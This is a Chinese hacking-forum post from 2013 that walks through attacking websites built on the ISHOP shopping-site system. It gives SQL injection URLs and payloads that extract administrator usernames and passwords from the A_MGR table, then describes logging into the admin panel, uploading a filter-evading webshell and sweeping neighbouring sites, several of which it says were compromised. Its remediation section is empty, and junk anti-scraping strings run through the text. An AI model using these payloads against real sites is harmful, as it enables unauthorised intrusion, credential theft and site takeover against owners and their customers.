中国网络渗透测试联盟
标题:
ISHOP商场建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:40
标题:
ISHOP商场建站系统注入漏洞
发现一个注入点
. D+ \8 P7 h9 f d' p' m
http://www.xxx.com
/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
: Q" s6 U7 b8 i2 w+ j6 y
2 Z# w1 K, p# J" F' n
习惯性的加’having1=1--
/ Y% y0 y7 e8 s8 ?! c& r& g' c, m+ _
" Z) T/ j X. f% D' {, \
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’having 1=1—
. M; q6 u2 c6 Q# m- w
6 u7 {: f% W, q1 S2 f }8 D
0
; A9 h6 X, S* J0 q$ _1 J$ ?
9 m3 J7 q; j! T D# o) O5 R
爆出Diary_A.dl_Title(这时候很激动啊)
) F! t8 h1 j! J6 f# U p% r+ l
' J) A' t, G% F& ~! p; V( Z) j! a
那么继续
7 A2 b# [* [7 N% @
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’group by dl_Title having 1=1—
! V" z1 H# ^) c& F
$ \* }1 Q e5 [& I, H2 ^
继续,一直爆下去
) b$ R6 ^+ a, Y E( T* ^7 k, q: L6 {
4 O# U. u# X& R4 }1 @
爆到几个字段和表段 但是没找到需要的管理用户的字段
' [, n5 M* ]( N: G. Z+ R+ [6 v) Z
`# V* t, S: `6 {; X; D4 l4 `& c8 Y
蛋疼了 怎么办 然后去后台登陆页看源码
; ]) h& Y5 J9 }; V
9 R* F* o0 R* l3 ~
0
" L7 d; I2 {' {0 A4 J' `5 z
2 U! s3 L+ |- ? A- w2 v+ B
Input name= “ADUID”
$ f- m5 J0 X o, e+ ]& _4 N, M. p' j
Input name= “ADPWD”
8 @9 J" ]! y; I9 ]. X- t; h
& u) g2 h) A9 g" J& I3 h8 F
很幸运 找到了字段那就继续
* ?1 }# O$ s" c2 v, W# d4 z
找到之后开始爆用户
* A2 @" O. _1 w7 X# I
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_UID from A_MGR)>0—
( T* _6 A) o. m; A$ L
爆密码
) X9 y5 @3 [* ~% N$ s7 p8 I. q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_PWD from A_MGR)>0—
4 v2 Z6 B! R2 ^+ a2 C+ w5 ?
测试了下 这个注入点只能爆到文章哪里的表
/ F/ `+ F5 s2 W2 O2 B- e
5 }1 k$ Y% Z1 p0 l
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
: b2 Y: |' \8 x# \. V
1 x; t" X) V2 o3 `
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
2 d7 L( V/ d/ E, n. L
) |* @0 i8 Z- w2 u
473
& \4 C, w2 U0 s/ \1 P! g% o0 }4 G' h
2 R7 \& C; w1 ?( s/ z4 ?
进后台
8 \# n! I8 y! E# o5 _6 g( t6 S
# I) w! L2 `2 e6 I1 X X9 C
4 W; x8 W H; T( k0 m: R0 c" j$ H$ W
发现几个上传点 有的地方不能上传 而且防止恶意代码
' l7 B5 q, Z0 |, Q( o# a
# J' D4 O' K9 \" L
没办法 各种百度各种找大牛 找到一只好像可以突破的马
: \+ X* _' ^. i' Q2 m
; [' ~5 {5 `1 o! E- r7 N
4 Y; C7 W* V3 u' M. H1 F0 E
在系统管理那里直接上传 不过没有显示地址
! O2 V6 V+ p1 l
7 a4 H' j- U+ L* k5 B5 L4 M0 l
再上传一次 抓包 搞定OK
* z, u5 k/ N- y# w) m% q$ r
A& R8 G1 v3 \* B9 X6 L. M' T
5 s( }# J- a4 ~% [2 c x
# O" s( F, g4 A3 o0 x$ M$ P8 s
472
- B" X' ?: H& ^* ~5 s2 f# c4 U5 f) D
3 Q( t" r4 A* e- e$ E
晚上不行了 去睡觉。。。
% w' }2 X5 Y4 f" I3 `6 u/ r
第二天刚起床 闲的没事做继续日站吧
- a/ E; P+ T: O4 T7 q, ^( t8 J
' S+ D: `2 _* X
找个站 就把这个站的旁c扫了下
2 t; ?; I/ W# O4 k+ E5 x4 W
/ e! P* D+ Z' E7 z3 G E" M/ Y
发现c段也有一个购物站 ,然后还和这个站的模板差不多
: V& m6 D+ W( b$ Z) X% _
; v5 ~9 O3 u# E3 I2 K
就找到会员登录口测试
I3 |6 D+ u% Y- D5 K4 v2 [0 s
2 K! a* p: N9 J |$ A
'and (select top 1 MGR_UID from A_MGR)>0—
4 \9 D& n0 S7 r. p. e* v6 t
果断爆到了 这时候我很激动 通杀
, @# f9 y! ^) G; P$ x4 o
& N9 X1 D) ?9 s* K
再次翻c段
2 }4 u% P& U" Q; b& X, ^
$ L# W1 ?( r. z
翻出几个站 都成功拿下
' i' p( c9 k0 v" @
- U+ h: Z) [, c, w# ]
: G+ _' {4 s3 ~0 H- u
8 S8 K: X; ^3 r1 V" x
修复方案:
, a: E/ \, f( I5 d
他们比我专业
& E2 a6 g( N! T& ^5 l. j. e
2 C9 a7 O& M1 j7 B7 G {5 d, B
. ?& a' p$ ]! I: j, j9 P
- b+ ~; B# Z5 h8 {0 c8 u
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2